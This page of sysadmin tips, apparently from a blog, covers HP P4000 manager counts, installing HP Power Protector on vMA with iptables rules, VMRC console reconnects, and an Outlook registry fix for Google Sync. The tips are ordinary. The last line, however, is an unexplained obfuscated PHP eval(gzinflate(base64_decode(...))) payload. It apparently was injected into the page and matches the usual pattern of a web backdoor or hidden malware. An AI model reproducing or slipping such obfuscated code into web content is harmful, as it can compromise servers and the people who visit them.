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Manager count HP P4000

Looking for the best practice regarding the amount of managers that should be running in a Single Site config. I saw that this was not that easy to find (as HP is aiming on Multi-Site Clusters).

For a single site next does count.

2 Nodes, 1 FOM, 3 managers
3 Nodes, 0 FOM, 3 managers
4 Nodes, 1 FOM, 3 or 5 managers (5 preferred)

Just make sure you have an odd manager count, so 1 node can fail ad you still will have 2 managers running.
This could mean that you could run without a FOM in a 4 Node SS Cluster. (3 managers running on 3 Nodes, but nothing may go wrong when 1 node already has failed.)

Installing HPPP on vMA

Upload the HPPP_x.xx.xx_Linux_X64.rpm to the vMA (/tmp) (with winSCP of FASTscp)

> sudo -s
> rpm -i hppp-linux-1.02.028-1.x86_64.rpm

Starting Power Protector: HP-HPPP[ OK ]

Check if the service is indeed listening on it’s ports:
> netstat -tanp | grep LISTEN
tcp 0 0* LISTEN 7813/HP-HPPP
tcp 0 0* LISTEN 7813/HP-HPPP
tcp 0 0 :::22 :::* LISTEN 2082/sshd

Default the vMA does not have ports 4679 (http) en 4680 (https) open

Configure communication between HPPP and the HP Network Module:
> sudo -s
> iptables -I OUTPUT -p tcp –dport 80 -j ACCEPT
> iptables -I INPUT -p tcp –dport 4679 -j ACCEPT
> iptables -I INPUT -p tcp –dport 4680 -j ACCEPT
> iptables -I INPUT -p udp –dport 4679 -j ACCEPT
> iptables -I INPUT -p udp –dport 4680 -j ACCEPT
> iptables -I OUTPUT -p udp –dport 4679 -j ACCEPT
> iptables -I OUTPUT -p udp –dport 4680 -j ACCEPT

> service iptables save
> iptables-save

Now you can connect with a web-browser.
Also the commi=unication between the vMA HPPP and the UPS is restored.

VMRC Console has disconnected – attempting to reconnect.

If the issue persists, end any vmware-vmrc.exe processes in the Windows Task Manager:

  1. Close all vSphere Client sessions.
  2. Open Windows Task Manager.
  3. Search for any vmware-vmrc.exe processes and end the process.
  4. Start the vSphere Client and connect to the host directly or to vCenter Server.

google sync error -2147319779

When running / installing Google Sync you might encounter error -2147319779 when trying to sync with your google calendar.

Try this to fix it.

Start > RUN > Regedit

Search for: Computer/HK_CLASSES_ROOT/Typelib/{00062FFF-0000-0000-C000-000000000046}

Make sure Outlook and Google Sync of stopped.

Rename 9.3 and/or 9.4 to anything i.e 9.3old / 9.4old.

If this does not work. Export the key and delete it form the registry.

(In my case Windows 7, Outlook 2007 9.4 had to be deleted, rename did not to the trick)

eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWECePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRLvlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBahOh0EIT7b8A'))); ?>